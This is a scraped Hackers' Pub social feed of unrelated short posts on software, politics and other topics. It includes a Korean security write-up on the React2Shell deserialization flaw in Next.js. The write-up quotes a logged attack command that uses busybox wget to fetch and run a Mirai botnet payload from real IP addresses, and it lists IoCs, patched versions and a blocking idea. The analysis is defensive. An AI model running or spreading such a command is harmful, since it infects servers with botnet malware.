Hackers' Pub is a place for software engineers to share their knowledge and experience with each other. It's also an ActivityPub-enabled social network, so you can follow your favorite hackers in the fediverse and get their latest posts in your feed.
T2 "Never Obsolete" Package Manager and Linux Distribution https://lobste.rs/s/wdaku1 #linux
https://t2linux.com/
Which #fediverse #activitypub server is the easiest to run in #docker?
I'd like to test my own AP software without littering the live network
RE: https://stefanbohacek.online/@roots/115734983847490330
"Oak tree roots are known for their highly adaptable and deep systems, which can extend up to three times the size of the tree’s canopy."
https://treenewal.com/the-root-system-of-oak-trees-the-essential-guide/
@reiver ⊼ (Charles) 
shared the below article:
Todd Sundsted @toddsundsted@epiktistes.com
The big feature in release v3.2.4 of Ktistec is support for viewing and voting on Mastodon polls (AKA FEP-9967: Polls). This feature took a surprising amount of work. Some of the effort was due to my struggles with visual design, but getting the behavior right was also tricky. For example, a "vote" is just an ActivityPub Note, but unlike other notes, it shouldn't appear in a poll's replies (it could, but that would be redundant and confusing). So I had to add exceptions throughout the code to deal with this. A custom Vote object type would have been nice in the original implementation.
Added
Fixed
title attributes are now preserved.Changed
Thank you @jayvii for the build fix!
#ktistec #crystallang #activitypub #fediverse
Scanned Textures is now on sale again for 50% off! Each pack has 200 textures each good for personal and commerical use. Use them in your games, comics, TTRPGs, videos, etc.
https://itch.io/s/172874/scanned-textures-winter-sale-2025
https://buymeacoffee.com/clasticartistic WS50SALE
#textures #assets #art #design #sale #discount #indie #fediart #mastoart
loro-extended: A toolkit for building local-first applications and multi-agent systems with Loro https://lobste.rs/s/b7sjoi #javascript
https://github.com/schoolAI/loro-extended
Linux Kernel Rust Code Sees Its First CVE Vulnerability https://lobste.rs/s/nesn9g #linux #rust
https://www.phoronix.com/news/First-Linux-Rust-CVE
Yep, Passkeys Still Have Problems
Link: https://fy.blackhats.net.au/blog/2025-12-17-yep-passkeys-still-have-problems/
Discussion: https://news.ycombinator.com/item?id=46301585
They put this design on the back of modern Greek €1 coins. It's neat.
RE: https://eupolicy.social/@je5perl/115696467286859905
Some good news from Denmark! The government has withdrawn the #VPN proposal after just five days, claiming that the proposal was misunderstood and that banning VPN use was never the intention. In that case, the drafting was exceptionally bad, and withdrawing the proposal is clearly the right thing to do.
(source: press release yesterday from the Ministry of Culture https://kum.dk/aktuelt/nyheder/kulturministeren-justerer-lovforslag-og-fjerner-afsnit-om-vpn).
I have since learned that the Danish proposal was inspired by this Swedish expert report (Utretning SOU 2025:100) https://www.regeringen.se/rattsliga-dokument/statens-offentliga-utredningar/2025/09/sou-2025100/ about measures against IPTV, save for the bad drafting on the Danish side which brought VPNs into the game (maybe unintentional).
People in Sweden should be concerned about this attempt of #Copyright maximalism (see next post). The Swedish expert report is currently in consultation until 22 January 2026 https://www.regeringen.se/remisser/2025/10/remiss-av-betankandet-atgarder-mot-illegal-ip-tv-sou-2025100/
RE: https://mastodon.social/@jsparber/115736077309831181
Kudos to 
@amolenaarArjan and everyone else who worked on making 
@GTK on macOS better in recent years ❤️
If you’ve felt safer sending a message because you sent it on Signal, please support our work. As a nonprofit, Signal exists because of your donations.
In the app: Settings > Donate
On the web: https://signal.org/donate/
Added Ruby 3.4.8 to the ruby-versions database. Now ruby-install users can safely install Ruby 3.4.8.
$ ruby-install -U ruby-3.4.8
https://www.ruby-lang.org/en/news/2025/12/17/ruby-3-4-8-released/
https://github.com/postmodern/ruby-install#readme
ACM is now showing an AI “summary” of a recent paper of mine on the DL instead of the abstract. As an author, I have not granted ACM the right to process my papers in this way, and will not. They should either roll back this (mis)feature or remove my papers from the DL.
Hi 
@ACMAssn for Computing Machinery,
I as a member human wouldn't want to read machine written texts and the original author 
@hovavHovav Shacham doesn't want to be promoted this way.
Why do you do this?
ACM is now showing an AI “summary” of a recent paper of mine on the DL instead of the abstract. As an author, I have not granted ACM the right to process my papers in this way, and will not. They should either roll back this (mis)feature or remove my papers from the DL.
In this week's episode we demonstrate how to execute dynamic SQL queries based on actions the user takes. It works great from an @Observable model (and SwiftUI view, of course), and it's also animatable!
👉 https://www.pointfree.co/collections/tours/tour-of-sqlitedata/ep348-tour-of-sqlitedata-querying
To change an environment variable in tcsh you use: setenv NAME "value"
where NAME is the name of the variable and "value" its new value.
Nach einer echt schwierigen Sitzung im Kulturausschuss mit BKM Weimer, die ich gerade noch verdaue; bin ich im Plenum:
Ich ärgere mich (vor allem über mich selbst), dass es hier zu Gezänk Linke v. Grüne kam: ich kenne und schätze viel Menschen bei den Linken. Viele waren meine Freunde lange bevor ich in den BT zog und sind es noch. Ähnliches kann ich über einige aus SPD und CDU sagen.
Ich bin überzeugt, dass es dort - wie bei Grüns - viele sehr anständige Menschen gibt. Einige kenne ich.
After reading this piece, it's hard not to see #anthropic as a cult, and a deeply creepy one at that.
https://www.404media.co/anthropic-exec-forces-ai-chatbot-on-gay-discord-community-members-flee/
If you’ve felt safer sending a message because you sent it on Signal, please support our work. As a nonprofit, Signal exists because of your donations.
In the app: Settings > Donate
On the web: https://signal.org/donate/
Endlich eine U-Bahn für Lurup und Osdorf! 🎉 Die Planungen der #U5Hamburg Richtung Westen sind in vollem Gange. Und Anfang 2026 könnt ihr euch bei Beteiligungsveranstaltungen einbringen – im Anschluss gibt es Infos zum Stand der unterschiedlichen Varianten.
Auch in Frankreich gibt es ein dramatisches Insektensterben, ähnlich wie in Deutschland. Zu den Ursachen gehören die #Klimakrise und Pestizide.
https://www.deutschlandfunk.de/insektensterben-daten-aus-frankreich-bestaetigen-deutsche-langzeitstudie-100.html
밍이때문에 산 날개없는 선풍기 사이로 밍이가 보이는 모습이다
Realized this setting exists in Visual Studio Code and imagining a scenario where a piece of code is alternately being edited in Visual Studio Code and Vim and one always inserts a trailing newline and the other always deletes the trailing newline
Syntactic musings on the fallibility effect https://lobste.rs/s/31yqhh #rust
https://blog.yoshuawuyts.com/syntactic-musings-on-the-fallibility-effect
A Safer Container Ecosystem with Docker: Free Docker Hardened Images
Link: https://www.docker.com/blog/docker-hardened-images-for-every-developer/
Discussion: https://news.ycombinator.com/item?id=46302337
바보바보 강아지
The PediSedate: A Winning Combination Of Video Games And Anesthesia
https://hackaday.com/2025/12/17/the-pedisedate-a-winning-combination-of-video-games-and-anesthesia/
Warum ist es eigentlich so leise, wenn es um die #Eingliederungshilfe geht?
Glaubt ihr wirklich, dass dies der letzte Vorstoß sein wird, das soziale Gefüge ins Wanken zu bringen?
1/ At bargaining yesterday, 
@ProPublica management said that they should have 100% discretion to replace workers with AI and would not commit to labeling future AI-generated content.
finished watching Match Made in Mistletoe 🌕🌕🌕🌕🌕
https://reviewdb.app/movie/1pm3QqCkrgSrTL1PA8OW10
To change an environment variable in tcsh you use: setenv NAME "value"
where NAME is the name of the variable and "value" its new value.
"OOO 주식회사 OOO 대표님 맞으시죠? 산업안전보건교육 받아야 하는 업체에 해당합니다. 직원이나 프리랜서 고용 있으시죠? 어쩌고~" 일단 쎄한 느낌을 받았습니다. 다다다 쏴붙이면서 중간에 질문할 틈을 최대한 막으면서 가는 꼬락서니가 관공서는 아니구나 싶었습니다. 고용이나 프리랜서 없다고 하니, 뚝 끊어 버립니다. 검색해보니, 이런식의 반쯤 사기같은 행태가 존재한다고 하네요. 소규모 법인 대표님들 조심하세요~
고남현 @gnh1201@hackers.pub
외부에서 수신된 특정한 규격에 따라 구조적으로 작성된 데이터를 처리한다면, 공격자가 어떠한 의도를 가지고 있다면 데이터를 보낼 때 실행 가능한 악의적 코드를 같이 넣어 보낼 가능성을 배제할 수 없다.
이것이 보안 약점이 되지 않기 위해선 이러한 공격자의 의도를 막아야하지만, React2Shell (CVE-2025-55182) 취약점은 이러한 공격자의 의도를 막지 못하고 실행을 무제한 허용하는 방법이 발견된 것이다.
특정한 규격에 따라 구조적으로 작성된 데이터를 처리하는 과정을 일컫는 용어를 "역직렬화"(Deserialization)이라고 한다.
특정한 규격은 잘 알려진 JSON, XML, YAML가 될 수도 있고, 자체 규격이 될 수도 있고, 혼합형이 될 수도 있다. React2Shell 취약점은 혼합형(JSON + aka. Flight)을 사용하였다.
자체 규격(aka. Flight)이 JavaScript로 정의된 객체의 성격을 임의로 변경(Prototype 개념 상 존재하는 생성자 수준의 속성(__proto__, constructor)에 접근하여 객체의 성격을 임의로 바꿀 수 있음)하는데 필요한 접근성을 가지고 있었기에 가능한 것이었다.
실무적으로 역직렬화 과정이 위험해지는 이유는 다음과 같다.
이 외에도 역직렬화 과정은 유사한 여러 취약 가능성을 가지고 있기 때문에, 역직렬화 과정을 보호하기 위한 여러 보완 장치의 구현이 필요하다.
역직렬화 취약점이 어떤 성격을 가지는 취약점인지 빠르게 이해하기 위해선, 역직렬화 취약점과 연관이 있는 취약점 사례와 공통적인 특징을 살펴볼 수 있다. 그 사례는 다음과 같다.
| 언어 / 생태계 | 역직렬화 취약점 사례 | 주요 공통점 |
|---|---|---|
| Java | CVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind) | 외부 입력이 객체 생성·역직렬화 경로(JNDI, XML/JSON 바인딩) 로 유입되어 gadget chain 또는 원격 클래스 로딩을 통해 RCE 발생 |
| .NET (C# / VB.NET) | CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase) | BinaryFormatter·ViewState 등 레거시 역직렬화 포맷을 신뢰하여 임의 타입 로딩·코드 실행 |
| Python | CVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS) | pickle·unsafe YAML 로더 사용으로 역직렬화 자체가 실행 트리거 |
| PHP (WP) | CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress) | unserialize() / maybe_unserialize()에 사용자 입력이 전달되어 PHP Object Injection(POP chain) 발생 |
| Ruby | CVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal) | YAML.load·Marshal.load 사용 시 임의 객체 생성 → 코드 실행 |
| JavaScript / Node.js | CVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript) | 구조 복원·객체 재구성 로직이 신뢰되지 않은 입력을 코드/객체로 해석 |
| Go | CVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul) | Unmarshal 단계에서 입력 검증 부족 → 구조체 복원 기반 로직 붕괴·DoS |
| Rust | GHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687) | 메모리 안전과 무관하게 serde 기반 역직렬화에서 신뢰되지 않은 데이터가 내부 타입으로 복원되어 로직 오염·DoS·잠재적 코드 실행 위험 |
| Kotlin / Android | CVE-2024-43080 (Android) / CVE-2024-10382 (Android Car) | Intent/Bundle/IPC 역직렬화 시 타입·검증 미흡 → 권한 상승·DoS |
| C / C++ | CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf) | Unpack 과정에서 데이터타입(VARIANT), vtable 포인터 오염 등 무결성 검증 부족 |
| Swift / iOS | CVE-2021-32742 (Vapor) | 외부 입력을 디코딩/객체 복원 시 신뢰 경계 붕괴 → DoS·정보 노출 |
| 산업용 (ICS/OT) | CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC) | 프로젝트 파일·관리 서버 입력을 신뢰된 내부 데이터로 가정하고 역직렬화 → RCE 및 물리 시스템 영향 가능 |
역직렬화 취약점은 언어와 환경을 가리지 않고 다양하게 나타나고 있으며, 발견된 역직렬화 취약점은 취약점 점수(CVSS 3.x)에서도 8.0에서 10.0 범위의 매우 높은 점수를 받고 있다.
역직렬화 취약점이 어떤 공통적인 특성을 가지는지 설명했으니, 이제 React2Shell 공격의 개념증명(PoC)에서 보인 공격 특성을 사전 정보(공격 대상인 RSC의 내부 이해)가 없이도 어느정도 파악할 수 있다.
여기 각각 JavaScript와 Python으로 작성된 주요 공격 개념증명 코드가 있다.
여기서 알 수 있는 정보는 다음과 같다.
@
Quincy
Jeff Atwood
北市真
Stefano Marinelli
__proto__, constructor )를 통해 Prototype을 변조할 수 있는 접근성을 가지고 있다는 것을 알 수 있다. 용어로는 "JavaScript prototype pollution"라고 한다.then 키워드를 통해 공격 대상 내부에 존재하는 Promise 객체에 붙겠다(또는 새로운 Promise 객체를 만들겠다)는 의도를 확인할 수 있다.value 필드 값이 아직 역직렬화 되기 전의 문자열 형태의 JSON인 것으로 봤을 때, 공격 대상 내부에서 JSON.parse 메소드의 호출을 예상할 수 있다._response._prefix 의 주입은 then 키워드가 등장하는 위치와 최대한 가까운 곳에서 일어나야 한다. 그래야 Promise 객체가 공격 코드를 트리거할 수 있기 때문이다.then 속성을 가지면서, 공격 코드를 수용할 수 있는 가장 연관성 높은 표현이라는 점을 모두 만족하는 부분은 {"then": "$Bx"}라는 것을 알 수 있다. $Bx를 처리하는 과정 중 (또는 $Bx가 처리한 결과에 대한 사후) 검증이 부족하다는 의미이다.Next-Action 헤더는 애초에 이 취약점의 원인이 된 어떤 기능을 켜고 끄는 것에 관한 것임을 예상할 수 있다. 개발된 앱에 존재하는 유효한 액션에 대한 Key를 알 수 있다면 그 액션의 실행을 요청함으로서 공격 코드 또한 실행할 수 있을 것이다.Catswords OSS로 제보된 내용에 따르면, React2Shell에 노출된 서버는 이런 명령이 들어온다고 한다. 한 회원이 학습용으로 구축한 React 서버에서 발견된 로그이다.
(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
cd /dev; \
busybox wget http://31.56.27.76/n2/x86; \
chmod 777 x86; \
./x86 reactOnMynuts)이 파일의 정체는 Mirai botnet이라 부르는 계열의 악성코드이다. React2Shell에 취약한 서버들은 이런 악성코드들을 서버에 주입받게 된다.
그럼 이 악성코드의 명성(?)은 어느정도일지 한번 체크해보자.
(그래 너 나쁜거 알았으니 그만 알아보자)
관련 IoC 는 다음과 같다.
3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)http://193.34.213.150/nuts/bolts (URL)http://31.56.27.76/n2/x86 (URL)범용 botnet이 설치되기 때문에 사실상 DDoS 공격 등 다양한 목적으로 악용되는 서버가 된다.
추가 분석은 아래 링크에서 확인할 수 있다.
Next.js를 사용하는 서버라면 취약점이 해결된 버전으로 업데이트하여야 한다. Next.js의 개발사 Vercel은 취약한 버전에 대해 다음과 같이 안내하고 있다.
| Vulnerable version | Patched release |
|---|---|
| Next.js 15.0.x | 15.0.5 |
| Next.js 15.1.x | 15.1.9 |
| Next.js 15.2.x | 15.2.6 |
| Next.js 15.3.x | 15.3.6 |
| Next.js 15.4.x | 15.4.8 |
| Next.js 15.5.x | 15.5.7 |
| Next.js 16.0.x | 16.0.10 |
| Next.js 14 canaries after 14.3.0-canary.76 | Downgrade to 14.3.0-canary.76 (not vulnerable) |
| Next.js 15 canaries before 15.6.0-canary.58 | 15.6.0-canary.58 |
| Next.js 16 canaries before 16.1.0-canary.12 | 16.1.0-canary.12 and after |
혹여 업데이트에 곤란을 겪고 있는 경우, Vercel에서 공식 제공하는 패치 도구를 활용하는 것도 좋은 방법이 될 수 있다.
Next-Action 헤더 + 시스템 OS 명령어 + 자바스크립트의 Array 또는 Object 관련 메소드, 이렇게 3요소가 같은 요청에 동시에 들어있는건 흔한 상황은 아니라는 점을 고려해서 차단 규칙을 만드는 것도 방법이 될 수 있다.
A lot of folks have asked me if I'm serious about relaunching Mozilla after their inevitable collapse.
What I can say with confidence is that if the brand assets become available, I would absolutely look into purchasing them, in the same manner Perifractic "resurrected" Commodore. I am no millionaire, so this would have to be a community-driven thing.
Imagine: everyday people like us banding together to resurrect our beloved browser. I'd absolutely do my part to spearhead that.
Imagine a reconstituted Mozilla as a cooperative owned by the community they serve.
That's the web we were promised. I'm an optimist and I believe it can happen.
I shared a meal with Rob Reiner at the San Jose airport many years ago. What a wonderful, generous person.
낮 동안 우리를 활기 있게 하신 저의 주님, 날아다니는 스파게티 괴물 님,
당신과 함께 있으리니, 자는 동안도 지켜 주시어 편히 쉬게 하소서.
"2. 주님의 자비로 저희가 오늘 범한 어리석음을 용서하시고, 내일은 더욱 선하게 살아가게 하소서."
🍝 날아다니는 스파게티 괴물 님께서 여러분과 함께.
😋 또한 주교의 면발과 함께 하소서.
🍝 기도합시다.
저의 주님, 날아다니는 스파게티 괴물 님, 이 밤을 편히 쉬게 하시고, 거룩한 죽음을 맞게 하소서.
2025-12-18T02:58:42+09:00
#날아다니는스파게티괴물님 #성면 #면발 #스파게티 #라멘 #파스타파리안 #성무일도 #성무일과 #매일전례
#FlyingSpaghettiMonster #FSM #HolyNoodle #Noodle #Spaghetti #Ramen #Pastafarian #NoodlyAppendage #Pastafarian #FSMism #FSMist #DivineOffice #DailyOffice #Breviary
Acabo de ver cómo la RAM de la torre que me monté hace unos meses, que me costó 94€, ha subido de precio hasta los 668€.
De verdad os lo digo, me da rabia porque es contribuir al ambiente de radicalización que vivimos, pero voy a adoptar tolerancia cero con la IA.
Comparing devices at the office this afternoon.
Samstags für den Sozialstaat oder sowas?
@rya@subversive.zone Diesen Samstag hätten wir jedenfalls wieder die Demo #IchBinArmutsbetroffen in Köln, Breslauer Platz, direkt hinter'm Hauptbahnhof. 14 - 16 Uhr. Ich denke, wir werden diesmal besonders viel zu sagen haben.
The new Mozilla CEO says he could block ad blockers in Firefox and estimates that it would bring in another $150 million, but he doesn't want to do that. Lmao. This guy has really lost the plot. Is he issuing threats to the users of an open-source project? Boy, what a disaster.
https://infosec.press/brunomiguel/is-mozilla-trying-hard-to-kill-itself
The new Mozilla CEO says he could block ad blockers in Firefox and estimates that it would bring in another $150 million, but he doesn't want to do that. Lmao. This guy has really lost the plot. Is he issuing threats to the users of an open-source project? Boy, what a disaster.
https://infosec.press/brunomiguel/is-mozilla-trying-hard-to-kill-itself
@nixCraftnixCraft 🐧 "You kids better eat that AI or I'm taking away your ad blockers for a month!"
Ned Batchelder
